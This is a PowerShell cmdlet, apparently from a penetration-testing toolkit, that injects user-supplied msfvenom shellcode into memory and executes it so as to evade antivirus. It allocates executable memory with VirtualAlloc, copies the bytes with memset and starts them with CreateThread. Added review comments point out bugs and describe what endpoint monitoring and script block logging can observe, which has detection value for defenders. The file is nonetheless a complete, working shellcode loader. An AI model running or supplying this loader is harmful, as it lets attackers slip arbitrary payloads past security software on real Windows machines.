Function Invoke-InMemoryPayload {
<#
.SYNOPSIS
Injects an msfvenom payload into a Windows machine's memory as a way to attempt evading Anti-Virus protections. This was built thanks to information from the Offensive Security PWK Course
.DESCRIPTION
This cmdlet is used to attempt bypassing AV software by injecting shell code in a byte array into a separate thread of specially allocated memory. It is possible that this will not be able to execute on certain Windows devices as the DLLs or user permissions may prevent the execution of this function.
.EXAMPLE
Invoke-InMemoryPayload -ShellCode 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
# This command injects NOP bits into a separate thread of specially allocated memory on a Windows machine.
.PARAMETER ShellCode
This parameter accepts byte input only. Quotations should not be used around your defined bytes as this will convert your bytes to strings
.INPUTS
[System.Byte[]]
.OUTPUTS
None
.NOTES
Author: Robert H. Osborne
Alias: tobor
Contact: [email protected]
.LINK
https://osbornepro.com
https://writeups.osbornepro.com
https://encrypit.osbornepro.com
https://btpssecpack.osbornepro.com
https://github.com/tobor88
https://github.com/OsbornePro
https://gitlab.com/tobor88
https://www.powershellgallery.com/profiles/tobor
https://www.linkedin.com/in/roberthosborne/
https://www.credly.com/users/roberthosborne/badges
https://www.hackthebox.eu/profile/52286
#>
[CmdletBinding()]
param(
[Parameter(
Mandatory=$True,
Position=0,
ValueFromPipeline=$True,
ValueFromPipelineByPropertyName=$True,
HelpMessage='Generate an msfvenom payload. Copy the value of the byte variable and place it here.')] # End Parameter
[Byte[]]$ShellCode
) # End param
# NOTE(review): the function has no Begin/Process/End blocks, so the body runs
# once as the End block. With pipeline input PowerShell binds one element per
# pipeline object, and only the last object bound is visible here; the
# -ShellCode argument form shown in .EXAMPLE is presumably the intended use.
Write-Verbose -Message "Importing DLL's..."
# P/Invoke declarations compiled at run time by Add-Type below. On Windows
# PowerShell this typically invokes the C# compiler and writes a temporary
# assembly. Defender note: the C# source, and the byte array when the call is
# made from a logged script block, are visible to PowerShell script block
# logging where it is enabled.
$CSCode = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$WinFunc = Add-Type -MemberDefinition $CSCode -Name "Win32" -Namespace "Win32Functions" -PassThru
# Allocation size: at least one 4 KiB page (0x1000), or the payload length when
# the payload is larger than that.
$Size = 0x1000
If ($ShellCode.Length -gt 0x1000) {
$Size = $ShellCode.Length
Write-Verbose -Message "Length of payload is $Size"
} # End If
Write-Verbose "Allocating a block of memory for execution using VirtualAlloc()..."
# VirtualAlloc(lpAddress=0, dwSize=$Size, flAllocationType=0x3000
# (MEM_COMMIT | MEM_RESERVE), flProtect=0x40 (PAGE_EXECUTE_READWRITE)).
# Defender note: a freshly allocated RWX region that is then handed to
# CreateThread (below) is the pattern endpoint monitoring commonly flags for
# this class of technique; these two calls are the observable events.
$X = $WinFunc::VirtualAlloc(0,$Size,0x3000,0x40)
Write-Verbose -Message "Writing payload to newly allocated memory block using memset()..."
# Copies the payload one byte per iteration: memset(base + i, byte, 1).
# $x and $X are the same variable (PowerShell variable names are case-insensitive).
# NOTE(review): ToInt32() assumes the address returned by VirtualAlloc fits in
# 32 bits; in a 64-bit process that conversion can throw, which lands in the
# Catch below. Left as-is here.
# The IntPtr memset returns is not captured, so it is emitted to the pipeline
# on every iteration even though .OUTPUTS says None.
For ( $i = 0 ; $i -le ($ShellCode.Length - 1); $i++ ) {
Try {
$WinFunc::memset([IntPtr]($x.ToInt32()+$i), $ShellCode[$i], 1)
} Catch [Exception] {
# $Error[0] is the most recent error record in the session.
Write-Error -Message $Error[0]
Throw "[x] There was an error executing payload. Cmdlet is being prevented from allocating memory with the utilized DLLs."
} Catch {
# NOTE(review): effectively unreachable - every .NET exception derives from
# System.Exception, so the [Exception] handler above matches first.
Throw "[x] I have not caught this error before. Please email me the results at [email protected]"
} # End Try Catch Catch
} # End For
Write-Verbose -Message "Executing in separte thread using CreateThread()..."
# CreateThread(lpThreadAttributes=0, dwStackSize=0, lpStartAddress=$X,
# lpParameter=0, dwCreationFlags=0, lpThreadId=0): starts a thread at the base
# of the allocated region. The returned handle is not captured and is emitted
# to the pipeline.
$WinFunc::CreateThread(0,0,$X,0,0,0)
# Sleeps indefinitely - presumably so the host process, and with it the thread
# started above, is not torn down when this function would otherwise return.
# Only interrupting or ending the host process leaves this loop.
For (;;) {
Start-Sleep -Seconds 60
} # End For
} # End Invoke-InMemoryPayload